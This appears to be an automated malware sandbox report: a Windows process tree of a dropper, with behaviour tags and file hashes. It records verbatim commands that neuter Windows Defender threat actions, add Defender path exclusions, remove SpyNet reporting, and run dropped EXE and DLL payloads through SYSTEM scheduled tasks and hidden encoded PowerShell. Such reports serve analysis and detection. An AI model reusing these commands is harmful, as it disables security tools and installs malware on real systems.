C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4484
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1512
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AJYQrkrAhIRXC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AJYQrkrAhIRXC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CrVpqlWoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CrVpqlWoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lVrlTdgfhXOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lVrlTdgfhXOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oQtMlHEnfKUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oQtMlHEnfKUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hfmUoVlnDXXxKeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hfmUoVlnDXXxKeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PtFLChdTWFkbMOwK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PtFLChdTWFkbMOwK\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1412 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:323⤵PID:4900
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:324⤵PID:2624
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:643⤵PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:323⤵PID:216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:643⤵PID:3000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:323⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:643⤵PID:2676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:323⤵PID:1072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:643⤵PID:4728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:323⤵PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:643⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hfmUoVlnDXXxKeVB /t REG_DWORD /d 0 /reg:323⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hfmUoVlnDXXxKeVB /t REG_DWORD /d 0 /reg:643⤵PID:3580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR /t REG_DWORD /d 0 /reg:323⤵PID:3896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR /t REG_DWORD /d 0 /reg:643⤵PID:3824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PtFLChdTWFkbMOwK /t REG_DWORD /d 0 /reg:323⤵PID:3748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PtFLChdTWFkbMOwK /t REG_DWORD /d 0 /reg:643⤵PID:4736
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJxBvHkGX" /SC once /ST 02:16:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJxBvHkGX"2⤵PID:4520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJxBvHkGX"2⤵PID:1640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wLvsIRnBfEcGhlAOV" /SC once /ST 01:58:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\VlxAnxC.exe\" 0b /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wLvsIRnBfEcGhlAOV"2⤵PID:1036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3512 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4212
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1420
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2620
-
C:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\VlxAnxC.exeC:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\VlxAnxC.exe 0b /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4916 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKFjthDDlmdmBdSpYV"2⤵PID:3532
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1916
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2128
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1496
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CrVpqlWoU\onCUrZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gJECdJUNuqvNlNQ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJECdJUNuqvNlNQ2" /F /xml "C:\Program Files (x86)\CrVpqlWoU\hIKevFL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gJECdJUNuqvNlNQ"2⤵PID:2408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJECdJUNuqvNlNQ"2⤵PID:424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zMXAekEoOFzMiq" /F /xml "C:\Program Files (x86)\lVrlTdgfhXOU2\apXoZry.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzmbNextDjATo2" /F /xml "C:\ProgramData\hfmUoVlnDXXxKeVB\LgiViaV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CPJtugmqbghMWscDr2" /F /xml "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\wtctpnb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DmuWdpWCmdYRHkgJrjb2" /F /xml "C:\Program Files (x86)\AJYQrkrAhIRXC\ZrrWxYo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CDUwqlMPSeBRbvnPZ" /SC once /ST 02:29:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PtFLChdTWFkbMOwK\uQVSwkGR\tPrcNxJ.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CDUwqlMPSeBRbvnPZ"2⤵PID:3824
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:1368
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3136
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2388
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wLvsIRnBfEcGhlAOV"2⤵PID:1536
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PtFLChdTWFkbMOwK\uQVSwkGR\tPrcNxJ.dll",#1 /site_id 5254031⤵PID:2360
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PtFLChdTWFkbMOwK\uQVSwkGR\tPrcNxJ.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:4628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CDUwqlMPSeBRbvnPZ"3⤵PID:1184
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5555d82d31d26b8d414355e2bf7c999de
SHA12134900074ee5a6bf647d49b872c4e3721c93af7
SHA256dda715f36813203f68ac3bb9bda9d0b94130cbef3dd985aac5590e0ada0c27b2
SHA5123d72041aca822727336ca96c624214bf211579e1cfd8c7b8f9ba7e11909acc622fc2c11b16904426f0160efea44332b93b7eb5acb111b25f267e03a3548c6b0a
-
Filesize
2KB
MD5afc274674bcca5bf440ca14b02bdf7c5
SHA15e079c7fb4b918669a35f3f6eaa3be6c7ce8fd6f
SHA2560744c3b7ff81ef9abc689f91c5dddc41d28590741d274647d169bba456dc7302
SHA5126859ba3dc989f5f7d8bbc987f551cbcecf190bb0c05193262836dc5d5d6634bc36b91940ca882a653e075485d37576feeb25a611b5aeb5f7b2b7d257c44e3f4f
-
Filesize
2KB
MD50c5a64fdffa07bdb5ecd089eba6ee772
SHA12481c382042c832bfb2dabe278a8dc8223933d97
SHA256b4bfe067f52ffadc8e952982a62aa1f2ba5785cd2b4c5b39ea005f70b8d169bd
SHA512db8415ea932eb571f7d7ae7b1ebbf222fb0b6d2ff2b7e74e20e0ef2a6f522140753d03e5befc5f770571e8a625e2db62699a8fac95c20dcb5a996bd8dda7077c
-
Filesize
2KB
MD515dd971e45f173f2f7bd8ff02ca0f2fa
SHA1b957f7e8007fdfc74159f7b227eac242794fa808
SHA256a320108b2137dae2b203be2f4be199bf658876507126a0972d7786aeb1d95545
SHA5127804b3dfd6c121274b667bf714cd2a64114097f659a69a33f35b3b193032398e64cb00fcecdf227c990406c4ea95f2eb6ff438d1c0e5308ec86e76c35a9489d0
-
Filesize
2KB
MD5e4acc121988b64562cd5e175840d6695
SHA1bf16432601ec47719516038315448a1e93540dda
SHA256474ac2fd886ff4af791e5541ffb5a585b699c4441938026eba9abddd82de1bee
SHA512ffaf2c537733d62e410924eb77abcc2cfdc8ae9282c9e9d1c3aa2d8f0317a081120219dcb08fe2b053ed82a8d2f34bc77643e8a30c2f0eaae90d790c4243f74e
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5dbf9fec0284459c885c695c96fdd4e67
SHA1f3530eb549137596bb53cde08a3e3cc1ea237faf
SHA2563cc2ef28f616ca2a6e5fb06da63d6bdb53b63e92701ecee38e84f98b7f56b38a
SHA51295a7858d009940a1c29f9c05c2bd2a6a03a3122fe749546d87e435b5d3172fd0d22dec099b450be3ea99c58b8681484eafd8ad00be1364d9085fc4a9f249f452
-
Filesize
6.3MB
MD575c0ed9212804852faad0757e75812f1
SHA1a9f41d883966ad720da9acc1e91c292177fbf97e
SHA256dd4a446e2317e4e6d34bb2152d527dd0175d7340b370217f5d1e50125d482f62
